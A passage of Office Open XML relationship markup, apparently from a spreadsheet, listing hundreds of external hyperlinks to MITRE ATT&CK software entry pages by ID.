Target="https://attack.mitre.org/software/S0279" TargetMode="External"/><Relationship Id="rId357" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0253" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0023" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0021" TargetMode="External"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0246" TargetMode="External"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0372" TargetMode="External"/><Relationship Id="rId399" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0142" TargetMode="External"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0210" TargetMode="External"/><Relationship Id="rId424" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0116" TargetMode="External"/><Relationship Id="rId466" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0471" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0127" TargetMode="External"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0396" TargetMode="External"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0402" TargetMode="External"/><Relationship Id="rId326" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0495" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0335" TargetMode="External"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0076" TargetMode="External"/><Relationship Id="rId368" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0218" TargetMode="External"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0170" TargetMode="External"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0409" TargetMode="External"/><Relationship Id="rId435" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0476" TargetMode="External"/><Relationship Id="rId477" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0101" TargetMode="External"/><Relationship Id="rId281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0598" TargetMode="External"/><Relationship Id="rId337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0364" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0475" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0369" TargetMode="External"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0277" TargetMode="External"/><Relationship Id="rId379" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0370" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0331" TargetMode="External"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0434" TargetMode="External"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0133" TargetMode="External"/><Relationship Id="rId390" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0468" TargetMode="External"/><Relationship Id="rId404" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0096" TargetMode="External"/><Relationship Id="rId446" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0059" TargetMode="External"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0590" TargetMode="External"/><Relationship Id="rId292" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0196" TargetMode="External"/><Relationship Id="rId306" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0518" TargetMode="External"/><Relationship Id="rId488" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0111" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0521" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0538" TargetMode="External"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0064" TargetMode="External"/><Relationship Id="rId348" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0125" TargetMode="External"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0477" TargetMode="External"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0528" TargetMode="External"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0250" TargetMode="External"/><Relationship Id="rId415" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0467" TargetMode="External"/><Relationship Id="rId457" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0388" TargetMode="External"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0056" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0438" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0137" TargetMode="External"/><Relationship Id="rId317" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0029" TargetMode="External"/><Relationship Id="rId359" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0085" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0281" TargetMode="External"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0401" TargetMode="External"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0061" TargetMode="External"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0582" TargetMode="External"/><Relationship Id="rId370" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0157" TargetMode="External"/><Relationship Id="rId426" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0275" TargetMode="External"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0167" TargetMode="External"/><Relationship Id="rId468" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0106" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0190" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0261" TargetMode="External"/><Relationship Id="rId272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0346" TargetMode="External"/><Relationship Id="rId328" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0496" TargetMode="External"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0171" TargetMode="External"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0394" TargetMode="External"/><Relationship Id="rId381" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0345" TargetMode="External"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0280" TargetMode="External"/><Relationship Id="rId437" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0180" TargetMode="External"/><Relationship Id="rId479" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0283" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0337" TargetMode="External"/><Relationship Id="rId283" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0158" TargetMode="External"/><Relationship Id="rId339" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0172" TargetMode="External"/><Relationship Id="rId490" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0225" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0244" TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0134" TargetMode="External"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0026" TargetMode="External"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0259" TargetMode="External"/><Relationship Id="rId350" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0379" TargetMode="External"/><Relationship Id="rId406" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0586" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0504" TargetMode="External"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0236" TargetMode="External"/><Relationship Id="rId392" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0273" TargetMode="External"/><Relationship Id="rId448" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0005" TargetMode="External"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0034" TargetMode="External"/><Relationship Id="rId294" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0208" TargetMode="External"/><Relationship Id="rId308" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0378" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0252" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0255" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0377" TargetMode="External"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0237" TargetMode="External"/><Relationship Id="rId361" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0195" TargetMode="External"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0271" TargetMode="External"/><Relationship Id="rId417" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0595" TargetMode="External"/><Relationship Id="rId459" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0251" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0129" TargetMode="External"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0121" TargetMode="External"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0457" TargetMode="External"/><Relationship Id="rId319" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0147" TargetMode="External"/><Relationship Id="rId470" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0105" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0119" TargetMode="External"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0361" TargetMode="External"/><Relationship Id="rId330" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0003" TargetMode="External"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0232" TargetMode="External"/><Relationship Id="rId372" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0390" TargetMode="External"/><Relationship Id="rId428" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0452" TargetMode="External"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0459" TargetMode="External"/><Relationship Id="rId274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0439" TargetMode="External"/><Relationship Id="rId481" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0102" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0520" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0144" TargetMode="External"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0182" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0575" TargetMode="External"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0601" TargetMode="External"/><Relationship Id="rId341" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0075" TargetMode="External"/><Relationship Id="rId383" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0596" TargetMode="External"/><Relationship Id="rId439" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0155" TargetMode="External"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0265" TargetMode="External"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0083" TargetMode="External"/><Relationship Id="rId285" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0435" TargetMode="External"/><Relationship Id="rId450" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0176" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0239" TargetMode="External"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0547" TargetMode="External"/><Relationship Id="rId310" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0139" TargetMode="External"/><Relationship Id="rId492" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0248" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0497" TargetMode="External"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0168" TargetMode="External"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0231" TargetMode="External"/><Relationship Id="rId352" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0448" TargetMode="External"/><Relationship Id="rId394" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0543" TargetMode="External"/><Relationship Id="rId408" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0560" TargetMode="External"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0349" TargetMode="External"/><Relationship Id="rId254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0353" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0482" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0081" TargetMode="External"/><Relationship Id="rId296" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0556" TargetMode="External"/><Relationship Id="rId461" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0027" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0274" TargetMode="External"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0561" TargetMode="External"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0156" TargetMode="External"/><Relationship Id="rId321" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0583" TargetMode="External"/><Relationship Id="rId363" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0450" TargetMode="External"/><Relationship Id="rId419" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0183" TargetMode="External"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0010" TargetMode="External"/><Relationship Id="rId430" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0130" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0344" TargetMode="External"/><Relationship Id="rId265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0118" TargetMode="External"/><Relationship Id="rId472" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0032" TargetMode="External"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0181" TargetMode="External"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0040" TargetMode="External"/><Relationship Id="rId332" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0240" TargetMode="External"/><Relationship Id="rId374" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0562" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0107" TargetMode="External"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0530" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0065" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0415" TargetMode="External"/><Relationship Id="rId276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0052" TargetMode="External"/><Relationship Id="rId441" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0366" TargetMode="External"/><Relationship Id="rId483" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0104" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0574" TargetMode="External"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0143" TargetMode="External"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0203" TargetMode="External"/><Relationship Id="rId301" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0501" TargetMode="External"/><Relationship Id="rId343" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0019" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0050" TargetMode="External"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0487" TargetMode="External"/><Relationship Id="rId385" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0546" TargetMode="External"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0079" TargetMode="External"/><Relationship Id="rId287" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0150" TargetMode="External"/><Relationship Id="rId410" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0131" TargetMode="External"/><Relationship Id="rId452" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0141" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0567" TargetMode="External"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0460" TargetMode="External"/><Relationship Id="rId312" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0194" TargetMode="External"/><Relationship Id="rId354" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0270" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0465" TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0187" TargetMode="External"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0015" TargetMode="External"/><Relationship Id="rId396" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0058" TargetMode="External"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0211" TargetMode="External"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0228" TargetMode="External"/><Relationship Id="rId298" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0517" TargetMode="External"/><Relationship Id="rId421" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0094" TargetMode="External"/><Relationship Id="rId463" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0412" TargetMode="External"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0367" TargetMode="External"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0151" TargetMode="External"/><Relationship Id="rId323" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0262" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0245" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0351" TargetMode="External"/><Relationship Id="rId365" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0063" TargetMode="External"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0389" TargetMode="External"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0387" TargetMode="External"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0443" TargetMode="External"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0553" 